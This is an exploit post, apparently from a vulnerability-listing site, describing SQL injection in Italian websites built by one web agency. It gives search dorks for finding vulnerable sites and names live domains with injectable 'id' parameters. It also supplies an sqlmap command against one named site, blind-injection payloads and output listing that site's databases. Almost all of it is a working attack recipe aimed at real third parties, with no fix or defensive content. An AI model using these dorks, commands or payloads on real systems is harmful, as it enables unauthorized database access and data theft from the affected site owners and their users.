alfacommunication.it SQL Injection vulnerability

2019.11.29
sa H9xHacker (SA) sa
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title:alfacommunication.it SQL Injection vulnerability # Date:29/11/2019 # Dork: inurl:detail.php?id= site:.it inurl:5ad.php?id= site:.it inurl:single-news.php?id= site:.it inurl:caseinterno.php?id= site.it # Exploit Author:H9xHacker # Tested on:Linux Reverse check bing.com ip:54.76.134.14 .php?id= (There are 55 domains hosted on this server.) # Demo ediliziafiorentina.it/detail.php?id=19 old.faraone.it/5ad.php?id=319 intesagdi.it/0a-newsdetail.php?id=405 # Admin control panel path site.it/cms/ # Poc: sqlmap --level=5 --risk=3 --timeout=10 --threads=10 --random-agent -u 'http://old.faraone.it/5ad.php?id=319' --no-cast --batch --dbs --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=319 AND 7712=7712 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=319 AND (SELECT 9560 FROM (SELECT(SLEEP(5)))ORoc) --- web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal) web application technology: Apache 2.2.22, PHP back-end DBMS: MySQL >= 5.0.12 available databases [2]: [*] `cms-faraone` [*] information_schema ------------------------ video:https://www.youtube.com/watch?v=EEvMO-jyDPE Greets:To All My Friends


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top